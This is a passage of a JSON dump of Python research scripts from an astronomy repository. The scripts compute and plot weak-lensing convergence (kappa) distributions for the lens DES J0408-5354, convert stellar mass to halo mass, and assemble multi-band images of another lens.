(str(sys.argv[1])[0:len(str(sys.argv[1]))-4],str(sys.argv[3]),str(sys.argv[4])),'w')\nfor i in range(cells_on_a_side[0]):\n for j in range(cells_on_a_side[1]):\n s.write('name= %s coords= %s %s w_gal= %.4e w_oneoverr= %.4e w_zweight= %.4e w_mass= %.4e w_mass2= %.4e w_mass2rms= %.4e w_mass3= %.4e w_mass3rms= %.4e w_zoverr= %.4e w_massoverr= %.4e w_mass2overr= %.4e w_mass3overr= %.4e w_mass2overrrms= %.4e w_mass3overrrms= %.4e w_zmassoverr= %.4e w_zmass2overr= %.4e \\n' % (str(sys.argv[1])[0:len(str(sys.argv[1]))-4], centersx[i][j], centersy[i][j], 
B1608_specsim_gal[i][j], B1608_specsim_oneoverr[i][j], B1608_specsim_zweight[i][j], B1608_specsim_mass[i][j], B1608_specsim_mass2[i][j], B1608_specsim_mass2rms[i][j], B1608_specsim_mass3[i][j], B1608_specsim_mass3rms[i][j], B1608_specsim_zoverr[i][j], B1608_specsim_massoverr[i][j], B1608_specsim_mass2overr[i][j], B1608_specsim_mass3overr[i][j], B1608_specsim_mass2overrrms[i][j], B1608_specsim_mass3overrrms[i][j], B1608_specsim_zmassoverr[i][j], B1608_specsim_zmass2overr[i][j]))\n f.write('name= %s coords= %s %s w_gal= %.4e w_oneoverr= %.4e w_zweight= %.4e w_mass= %.4e w_mass2= %.4e w_mass2rms= %.4e w_mass3= %.4e w_mass3rms= %.4e w_zoverr= %.4e w_massoverr= %.4e w_mass2overr= %.4e w_mass3overr= %.4e w_mass2overrrms= %.4e w_mass3overrrms= %.4e w_zmassoverr= %.4e w_zmass2overr= %.4e \\n' % (str(sys.argv[1])[0:len(str(sys.argv[1]))-4], centersx[i][j], centersy[i][j], B1608_origsim_gal[i][j], B1608_origsim_oneoverr[i][j], B1608_origsim_zweight[i][j], B1608_origsim_mass[i][j], B1608_origsim_mass2[i][j], B1608_origsim_mass2rms[i][j], B1608_origsim_mass3[i][j], B1608_origsim_mass3rms[i][j], B1608_origsim_zoverr[i][j], B1608_origsim_massoverr[i][j], B1608_origsim_mass2overr[i][j], B1608_origsim_mass3overr[i][j], B1608_origsim_mass2overrrms[i][j], B1608_origsim_mass3overrrms[i][j], B1608_origsim_zmassoverr[i][j], B1608_origsim_zmass2overr[i][j]))\n for k in range(int(str(sys.argv[2]))):\n g.write('name= %s coords= %s %s w_gal= %.4e w_oneoverr= %.4e w_zweight= %.4e w_mass= %.4e w_mass2= %.4e w_mass2rms= %.4e w_mass3= %.4e w_mass3rms= %.4e w_zoverr= %.4e w_massoverr= %.4e w_mass2overr= %.4e w_mass3overr= %.4e w_mass2overrrms= %.4e w_mass3overrrms= %.4e w_zmassoverr= %.4e w_zmass2overr= %.4e \\n' % (str(sys.argv[1])[0:len(str(sys.argv[1]))-4], centersx[i][j], centersy[i][j], B1608_sim_gal[i][j][k], B1608_sim_oneoverr[i][j][k], B1608_sim_zweight[i][j][k], B1608_sim_mass[i][j][k], B1608_sim_mass2[i][j][k], B1608_sim_mass2rms[i][j][k], B1608_sim_mass3[i][j][k], B1608_sim_mass3rms[i][j][k], B1608_sim_zoverr[i][j][k], B1608_sim_massoverr[i][j][k], B1608_sim_mass2overr[i][j][k], B1608_sim_mass3overr[i][j][k], B1608_sim_mass2overrrms[i][j][k], B1608_sim_mass3overrrms[i][j][k], B1608_sim_zmassoverr[i][j][k], B1608_sim_zmass2overr[i][j][k]))\n for k in range(int(str(sys.argv[2]))):\n h.write('name= %s coords= %s %s w_gal= %.4e w_oneoverr= %.4e w_zweight= %.4e w_mass= %.4e w_mass2= %.4e w_mass2rms= %.4e w_mass3= %.4e w_mass3rms= %.4e w_zoverr= %.4e w_massoverr= %.4e w_mass2overr= %.4e w_mass3overr= %.4e w_mass2overrrms= %.4e w_mass3overrrms= %.4e w_zmassoverr= %.4e w_zmass2overr= %.4e \\n' % (str(sys.argv[1])[0:len(str(sys.argv[1]))-4], centersx[i][j], centersy[i][j], B1608_tab_sim_gal[i][j][k], B1608_tab_sim_oneoverr[i][j][k], B1608_tab_sim_zweight[i][j][k], B1608_tab_sim_mass[i][j][k], B1608_tab_sim_mass2[i][j][k], B1608_tab_sim_mass2rms[i][j][k], B1608_tab_sim_mass3[i][j][k], B1608_tab_sim_mass3rms[i][j][k], B1608_tab_sim_zoverr[i][j][k], B1608_tab_sim_massoverr[i][j][k], B1608_tab_sim_mass2overr[i][j][k], B1608_tab_sim_mass3overr[i][j][k], B1608_tab_sim_mass2overrrms[i][j][k], B1608_tab_sim_mass3overrrms[i][j][k], B1608_tab_sim_zmassoverr[i][j][k], B1608_tab_sim_zmass2overr[i][j][k]))\ns.close()\nf.close()\n#if str(sys.argv[8]) == \"samp\":\ng.close()\n#if str(sys.argv[8]) == \"tab\":\nh.close()\n\n\nprint(\"Total time forB1608_sim: --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n " }, { "alpha_fraction": 0.584221601486206, "alphanum_fraction": 0.6616601943969727, "avg_line_length": 
52.379310607910156, "blob_id": "2385bbce1d986f7a240a4c021ae1b728eec8f495", "content_id": "eb85234bdf3b11e16984cc13dfbd5d701f2b8c5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12384, "license_type": "no_license", "max_line_length": 231, "num_lines": 232, "path": "/python/plot_utilities/plotkappa_handpickedpaper0408.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Plots the equivalent of Figure 13 in Rusu et al. 2017\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\n\nmin_kappa = -0.20\nmax_kappa = 1\nmin_kappa_plot = -0.1\nmax_kappa_plot = 0.15\nbin_stat = 2000\nhalfwidth = (max_kappa - min_kappa) / (bin_stat * 2.0)\n\n#root = \"/Users/cerusu/Dropbox/\"\n#root = \"/Volumes/LaCieSubaru/kapparesults/\"\nroot = \"/Users/cerusu/Dropbox/Davis_work/code/0408/\"\n\ndef statistics(kappa_all_,bin_stat_,min_kappa_,max_kappa_):\n a, kappa_values = np.histogram([0], bins = bin_stat_, range=(min_kappa_,max_kappa_)) # create an empty histogram of the correct shape\n\n sum = np.sum(kappa_all_)\n #meanX = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth)) / sum\n #meanX2 = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth) ** 2) / sum\n #std = np.sqrt(meanX2 - meanX**2)\n\n med = 0\n i = 0\n ok = False\n while (med <= sum/2.0) and (ok == False):\n med = med + kappa_all_[i]\n if med > sum/2.0:\n median = kappa_values[i] + halfwidth\n ok = True\n if med == sum/2.0:\n median = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n\n std = 0\n ok = False\n i = 0\n while (std <= sum * 0.16) and (ok == False):\n std = std + kappa_all_[i]\n if std > sum * 0.16:\n std1_ = kappa_values[i] + halfwidth\n ok = True\n if med == sum*0.16:\n std1_ = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n\n std = 0\n ok = False\n i = 0\n while (std <= sum*0.84) and (ok == False):\n std = std + kappa_all_[i]\n if std > sum*0.84:\n std1 = kappa_values[i] + halfwidth\n ok = True\n if med == sum*0.84:\n std1 = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n\n stddev = (std1 - std1_) / 2\n\n return median,stddev,kappa_values\n\ndef smooth(x,window_len=11,window='hanning'):\n \"\"\"smooth the data using a window with requested size.\n\n This method is based on the convolution of a scaled window with the signal.\n The signal is prepared by introducing reflected copies of the signal\n (with the window size) in both ends so that transient parts are minimized\n in the begining and end part of the output signal.\n\n input:\n x: the input signal\n window_len: the dimension of the smoothing window; should be an odd integer\n window: the type of window from 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\n flat window will produce a moving average smoothing.\n\n output: the smoothed signal\n\n see also:\n\n numpy.hanning, numpy.hamming, numpy.bartlett, numpy.blackman, numpy.convolve\n scipy.signal.lfilter\n\n TODO: the window parameter could be the window itself if an array instead of a string\n NOTE: length(output) != length(input), to correct this: return y[(window_len/2-1):-(window_len/2)] instead of just y.\n \"\"\"\n\n if x.ndim != 1:\n raise ValueError, \"smooth only accepts 1 dimension arrays.\"\n if not window in ['flat', 'hanning', 'hamming', 'bartlett', 'blackman']:\n raise ValueError, \"Window is on of 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\"\n if x.size < window_len:\n raise ValueError, \"Input 
vector needs to be bigger than window size.\"\n\n if window_len<3:\n return x\n s=np.r_[x[window_len-1:0:-1],x,x[-2:-window_len-1:-1]]\n if window == 'flat': #moving average\n w=np.ones(window_len,'d')\n else:\n w=eval('np.'+window+'(window_len)')\n y=np.convolve(w/w.sum(),s,mode='valid')\n return y\n\nplt.clf()\n\nkappa_0 = np.loadtxt(\"%skappahistallLOS_plane30.cat\" % root, usecols=[0], unpack=True)\nmedian0,stddev0,kappa_values = statistics(kappa_0,bin_stat,min_kappa,max_kappa)\nkappa_0 = kappa_0 / np.sum(kappa_0 * np.abs((kappa_values[:-1]+halfwidth)))\n\n\nkappa_11 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_oneoverr_22.5_med_increments2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian11,stddev11,kappa_values = statistics(kappa_11,bin_stat,min_kappa,max_kappa)\nkappa_11 = kappa_11 / np.sum(kappa_11 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_12 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_zoverr_22.5_med_increments2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian12,stddev12,kappa_values = statistics(kappa_12,bin_stat,min_kappa,max_kappa)\nkappa_12 = kappa_12 / np.sum(kappa_12 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_17 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_22.5_med_increments2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian17,stddev17,kappa_values = statistics(kappa_17,bin_stat,min_kappa,max_kappa)\nkappa_17 = kappa_17 / np.sum(kappa_17 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_18 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_45_gal_45_oneoverr_22.5_med_increments2_2_2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian18,stddev18,kappa_values = statistics(kappa_18,bin_stat,min_kappa,max_kappa)\nkappa_18 = kappa_18 / np.sum(kappa_18 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_19 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_45_gal_45_zoverr_22.5_med_increments2_2_2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian19,stddev19,kappa_values = statistics(kappa_19,bin_stat,min_kappa,max_kappa)\nkappa_19 = kappa_19 / np.sum(kappa_19 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_20 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_zoverr_22.5_med_increments2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian20,stddev20,kappa_values = statistics(kappa_20,bin_stat,min_kappa,max_kappa)\nkappa_20 = kappa_20 / np.sum(kappa_20 * np.abs((kappa_values[:-1]+halfwidth)))\n\n\nkappa_31 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removelensgrouphandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_oneoverr_22.5_med_increments2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian31,stddev31,kappa_values = statistics(kappa_31,bin_stat,min_kappa,max_kappa)\nkappa_31 = kappa_31 / np.sum(kappa_31 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_32 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removelensgrouphandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_zoverr_22.5_med_increments2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian32,stddev32,kappa_values = statistics(kappa_32,bin_stat,min_kappa,max_kappa)\nkappa_32 = kappa_32 / np.sum(kappa_32 * 
np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_37 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removelensgrouphandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_22.5_med_increments2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian37,stddev37,kappa_values = statistics(kappa_37,bin_stat,min_kappa,max_kappa)\nkappa_37 = kappa_37 / np.sum(kappa_37 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_38 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removelensgrouphandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_45_gal_45_oneoverr_22.5_med_increments2_2_2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian38,stddev38,kappa_values = statistics(kappa_38,bin_stat,min_kappa,max_kappa)\nkappa_38 = kappa_38 / np.sum(kappa_38 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_39 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removelensgrouphandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_45_gal_45_zoverr_22.5_med_increments2_2_2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian39,stddev39,kappa_values = statistics(kappa_39,bin_stat,min_kappa,max_kappa)\nkappa_39 = kappa_39 / np.sum(kappa_39 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_40 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removelensgrouphandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_zoverr_22.5_med_increments2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian40,stddev40,kappa_values = statistics(kappa_40,bin_stat,min_kappa,max_kappa)\nkappa_40 = kappa_40 / np.sum(kappa_40 * np.abs((kappa_values[:-1]+halfwidth)))\n\n#s = \"%.3f %.3f LOS=%d\" % (median,std1,LOS)\ns0 = \"%.3f %.3f\" % (median0,stddev0)\n#s1 = \"%.3f %.3f\" % (median1,stddev1)\n#s2 = \"%.3f %.3f\" % (median2,stddev2)\n#s3 = \"%.3f %.3f\" % (median3,stddev3)\n#s4 = \"%.3f %.3f\" % (median4,stddev4)\n#s5 = \"%.3f %.3f\" % (median5,stddev5)\n#s6 = \"%.3f %.3f\" % (median6,stddev6)\n#s7 = \"%.3f %.3f\" % (median7,stddev7)\n#s8 = \"%.3f %.3f\" % (median8,stddev8)\n#s9 = \"%.3f %.3f\" % (median9,stddev9)\n#s10 = \"%.3f %.3f\" % (median10,stddev10)\ns11 = \"%.3f %.3f\" % (median11,stddev11)\ns12 = \"%.3f %.3f\" % (median12,stddev12)\n#s13 = \"%.3f %.3f\" % (median13,stddev13)\n#s14 = \"%.3f %.3f\" % (median14,stddev14)\n#s15 = \"%.3f %.3f\" % (median15,stddev15)\n#s16 = \"%.3f %.3f\" % (median16,stddev16)\ns17 = \"%.3f %.3f\" % (median17,stddev17)\ns18 = \"%.3f %.3f\" % (median18,stddev18)\ns19 = \"%.3f %.3f\" % (median19,stddev19)\ns20 = \"%.3f %.3f\" % (median20,stddev20)\ns31 = \"%.3f %.3f\" % (median31,stddev31)\ns32 = \"%.3f %.3f\" % (median32,stddev32)\ns37 = \"%.3f %.3f\" % (median37,stddev37)\ns38 = \"%.3f %.3f\" % (median38,stddev38)\ns39 = \"%.3f %.3f\" % (median39,stddev39)\ns40 = \"%.3f %.3f\" % (median40,stddev40)\n\nplt.subplot(1,1,1)\nax = plt.subplot(1,1,1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\nplt.ylim(0, 0.25)\n\nwinlen = 12\n#smooth(kappa_3,winlen,'flat')\n#smooth(kappa_3,winlen,'hanning')\n#smooth(kappa_3,winlen,'hamming')\n#smooth(kappa_3,winlen,'bartlett')\n#smooth(kappa_3,winlen,'blackman')\n\nplt.plot(kappa_values[:-1],smooth(kappa_0,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='k', linewidth=1, linestyle='-', label ='%s; all LOS' %s0)\n\nplt.plot(kappa_values[:-1],smooth(kappa_11,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='b', linewidth=1, linestyle='-', label ='%s; $45: 1,1/r$; w/ group' %s11)\nplt.plot(kappa_values[:-1],smooth(kappa_12,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='g', linewidth=1, linestyle='-', 
label ='%s; $45: 1,z/r$; w/ group' %s12)\nplt.plot(kappa_values[:-1],smooth(kappa_17,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='r', linewidth=1, linestyle='-', label ='%s; $120: 1,1/r$; w/ group' %s17)\nplt.plot(kappa_values[:-1],smooth(kappa_20,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='c', linewidth=1, linestyle='-', label ='%s; $120: 1,z/r$; w/ group' %s20)\nplt.plot(kappa_values[:-1],smooth(kappa_18,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='m', linewidth=1, linestyle='-', label ='%s; $120: 1,1/r; 45:1,1/r$; w/ group' %s18)\nplt.plot(kappa_values[:-1],smooth(kappa_19,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='orange', linewidth=1, linestyle='-', label ='%s; $120: 1,1/r; 45:1,z/r$; w/ group' %s19)\n\nplt.plot(kappa_values[:-1],smooth(kappa_31,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='b', linewidth=1, linestyle=':', label ='%s; $45: 1,1/r$; w/o group' %s31)\nplt.plot(kappa_values[:-1],smooth(kappa_32,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='g', linewidth=1, linestyle=':', label ='%s; $45: 1,z/r$; w/o group' %s32)\nplt.plot(kappa_values[:-1],smooth(kappa_37,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='r', linewidth=1, linestyle=':', label ='%s; $120: 1,1/r$; w/o group' %s37)\nplt.plot(kappa_values[:-1],smooth(kappa_40,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='c', linewidth=1, linestyle=':', label ='%s; $120: 1,z/r$; w/o group' %s40)\nplt.plot(kappa_values[:-1],smooth(kappa_38,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='m', linewidth=1, linestyle=':', label ='%s; $120: 1,1/r; 45:1,1/r$; w/o group' %s38)\nplt.plot(kappa_values[:-1],smooth(kappa_39,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='orange', linewidth=1, linestyle=':', label ='%s; $120: 1,1/r; 45:1,z/r$; w/o group' %s39)\n\nplt.xlabel(r'$\\kappa$', fontsize=14)\nplt.ylabel(r'normalized counts', fontsize=14)\nplt.legend(loc=\"upper right\",fontsize=8)\nplt.title(\"P($\\kappa$) for DES J0408-5354 using De Lucia & Blaizot (2007) galaxies\",fontsize=14)\nplt.savefig('%skappahist_handpicked_groupornot.pdf' % root, dpi=250, bbox_inches='tight')\n" }, { "alpha_fraction": 0.6334404945373535, "alphanum_fraction": 0.6713826656341553, "avg_line_length": 36.02381134033203, "blob_id": "d58ee3c76fe061633cfad6860bdb100b7b559677", "content_id": "ba00e821cdb773adf8826d61c42e10964bcaab9d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1555, "license_type": "no_license", "max_line_length": 165, "num_lines": 42, "path": "/python/catalogue_utilities/inferkappaallLOS.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Run as python inferkappaallLOS.py\n# Computes kappa for all LOS in the MS, producing a histogram in the same way that the other inferkappa codes do.\n\nimport sys\nimport os\nfrom os import system\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport time\nimport fitsio\n\nstart_time=time.time()\n\nroot = '/lfs08/rusucs/0408/MSwghtratios/'\noutput = '/lfs08/rusucs/0408/MSkapparesults/kappahistallLOS_plane30.cat'\n\nbin_stat = 2000\nmin_kappa = -0.20\nmax_kappa = 1\n\nprint \"Reading...\"\nfor j in range(8):\n for i in range(8):\n file = \"%snobeta30measuredmedinject_griz_lens_0408_GGL_los_8_%s_%s_22.5_45_5arcsecinner_gap_-1.0_-1.0.fits\" % (root,str(j),str(i))\n f = fitsio.FITS(file)\n print f # I need to print it, or f.hdu_list will not read\n ext = len(f.hdu_list)\n #if (i!=5) or (j!=5): # because one input field is missing\n #kappa_ = 
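\n # note: fitsio.read with columns=[1] loads only the kappa column from each field file, which keeps memory use manageable when concatenating all 8x8 simulated fields\n #kappa_ = 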
np.loadtxt(\"%snobeta35measuredmedinject_ugriz_WFI2033_GGL_los_8_%s_%s_45_5arcsecinnermsk.cat\" % (root,str(j),str(i)), usecols=[1], unpack=True)\n if (i == 0) and (j == 0): kappa = fitsio.read(file, columns=[1]).astype(float)\n else: kappa = np.append(kappa,fitsio.read(file, columns=[1]).astype(float))\n print j\n\nkappa_hist = np.histogram(kappa, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float)\nkappa_hist = kappa_hist/np.sum(kappa_hist)\nhead = \"LOS: \"+ str(len(kappa))\nnp.savetxt(output,kappa_hist,fmt='%s',delimiter='\\t',newline='\\n',header=head)\n\nprint(\" Total time --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.5045965313911438, "alphanum_fraction": 0.6082737445831299, "avg_line_length": 23.172840118408203, "blob_id": "45276672a33ce7ba35b23ad2a8f933970c8939ae", "content_id": "de9812fa029705ccfbc304e7f3752dd1da52a2ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1958, "license_type": "no_license", "max_line_length": 204, "num_lines": 81, "path": "/python/catalogue_utilities/MstartoMhalo.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# the code transforms Mstar to Mhalo using Behroozi et al. 2010. I used this to test if the MS De Lucia, Guo or Bower galaxies can be used to recover Mhalo from Mstar\n\nimport numpy as np\nimport sys\n\nfile = \"/Users/perseus/Desktop/GGL_los_8_0_0_0_0_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63.images.txt\"\nfileout = file[:-4] + \"plot.txt\"\n\nzspec = 5\nmhalo = 9\nmstar = 11\n\ndata = np.loadtxt(file,usecols=[zspec,mhalo,mstar],unpack=True)\n\nzspec = 0\nmhalo = 1\nmstar = 2\n\ndata[mstar] = np.log10(data[mstar])\ndata[mhalo] = np.log10(data[mhalo])\n\n# Behroozi et al 2010 parameters for z < 1:\nM10_ = 12.35\nM1a_ = 0.28\nMs00_ = 10.72\nMs0a_ = 0.55\nb0_ = 0.44\nba_ = 0.18\nd0_ = 0.57\nda_ = 0.17\ng0_ = 1.56\nga_ = 2.51\n# z >= 1:\nM10 = 12.27\nM1a = -0.84\nMs00 = 11.09\nMs0a = 0.56\nb0 = 0.65\nba = 0.31\nd0 = 0.56\nda = -0.12\ng0 = 1.12\nga = -0.53\n\ndatahalo = np.zeros(len(data[zspec]))\n\na = 1 / (1 + data[zspec][data[zspec] <= 1])\nlogM1a = M10_ + M1a_ * (a - 1)\nlogMs0a = Ms00_ + Ms0a_ * (a - 1)\nnotlogMs0a = 10 ** logMs0a\nb = b0_ + ba_ * (a - 1)\nd = d0_ + da_ * (a - 1)\ng = g0_ + ga_ * (a - 1)\ndatahalo[data[zspec] <= 1] = logM1a + b * (data[mstar][data[zspec] <= 1] - logMs0a) + ((10 ** data[mstar][data[zspec] <= 1]/notlogMs0a)**d)/(1+(10 ** data[mstar][data[zspec] <= 1]/notlogMs0a)**(-g)) - 1/2\ndel logM1a\ndel logMs0a\ndel notlogMs0a\ndel b\ndel d\ndel g\n\na = 1 / (1 + data[zspec][data[zspec] > 1])\nlogM1a = M10 + M1a * (a-1)\nlogMs0a = Ms00 + Ms0a * (a-1)\nnotlogMs0a = 10 ** logMs0a\nb = b0 + ba * (a-1)\nd = d0 + da * (a-1)\ng = g0 + ga * (a-1)\ndatahalo[data[zspec] > 1] = logM1a + b * (data[mstar][data[zspec] > 1] - logMs0a) + ((10 ** data[mstar][data[zspec] > 1]/notlogMs0a)**d)/(1+(10 ** data[mstar][data[zspec] > 1]/notlogMs0a)**(-g)) - 1/2\ndel logM1a\ndel logMs0a\ndel notlogMs0a\ndel b\ndel d\ndel g\n\ndataout = np.c_[data[mhalo],data[mstar],datahalo]\nhead = \"M_Halo \\t M_Stellar \\t M_Halo_Behroozi\"\nnp.savetxt(fileout,dataout,header=head,fmt='%.3e \\t %.3e \\t %.3e')\n\nprint ' Done!'\n" }, { "alpha_fraction": 0.6740226149559021, "alphanum_fraction": 0.7238922715187073, "avg_line_length": 58.94791793823242, "blob_id": "f2e002182ee6931c96b5a76ffbbfc82633ee4c7d", "content_id": "76ca16c86695191b7fef1ad479f4d9a56fab1830", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 5755, "license_type": "no_license", "max_line_length": 287, "num_lines": 96, "path": "/python/plot_utilities/image_mashup.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# creates the lens montage in Rusu et al. 2018a\n\nfrom astropy.io import fits\n#from matplotlib.colors import LogNorm\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.axes_grid1.inset_locator import InsetPosition\nfrom astropy.convolution import Gaussian2DKernel, convolve\n\nplt.clf()\n\nlim = 2 # sigma limits for plot range\nkernel = Gaussian2DKernel(stddev=2)\n\n# the simple way to center the images properly is to do a match > wcs in ds9 and record the matching central pixel coordinates in each image; python does not allow to non-integer margins, so do as below:\ncenter_g=[71,35]\ncenter_r=[71,35]\ncenter_i=[71,35]\ncenter_z=[71,35]\ncenter_y=[71,35]\ncenter_Y=[54,26]\ncenter_J=[54,27]\ncenter_K=[54,26]\nside_g = 60 # 15 arcsec\nside_r = 60\nside_i = 60\nside_z = 60\nside_y = 60\nside_Y = 44\nside_J = 44\nside_K = 44\n\nimage_g = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/final_g/nolens_analPSF_subtract.fits\")\nimage_r = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/final_r/nolens_correctPSF_subtract.fits\")\nimage_i = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/final_i/nolens_correctPSF_subtract.fits\")\nimage_z = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/final_z/nolens_correctPSF_subtract.fits\")\nimage_y = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/final_y/nolens_analPSF_subtract.fits\")\nimage_Y = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/final_VISTAY/nolens_analPSF_subtract.fits\")\nimage_J = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/final_J/lens_correctPSF_subtract.fits\")\nimage_K = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/final_K/lens_correctPSF_subtract.fits\")\n\nnoise_g = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/images/g_sigma_small.fits\")\nnoise_r = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/images/r_sigma_small.fits\")\nnoise_i = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/images/i_sigma_small.fits\")\nnoise_z = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/images/z_sigma_small.fits\")\nnoise_y = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/images/y_sigma_small.fits\")\nnoise_Y = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/images/VISTAmatch_Y_sigma_small.fits\")\nnoise_J = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/images/VISTAmatch_J_sigma_small.fits\")\nnoise_K = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/images/VISTAmatch_Ks_sigma_small.fits\")\n\ncat_g = np.loadtxt(\"astrom_g.cat\",unpack=True)\ncat_r = np.loadtxt(\"astrom_r.cat\",unpack=True)\ncat_i = np.loadtxt(\"astrom_i.cat\",unpack=True)\ncat_z = np.loadtxt(\"astrom_z.cat\",unpack=True)\ncat_y = np.loadtxt(\"astrom_y.cat\",unpack=True)\ncat_Y = np.loadtxt(\"astrom_YVISTA.cat\",unpack=True)\ncat_J = np.loadtxt(\"astrom_J.cat\",unpack=True)\ncat_K = np.loadtxt(\"astrom_K.cat\",unpack=True)\n\n# I'm adding an extra column, in which I will load the colormap. 
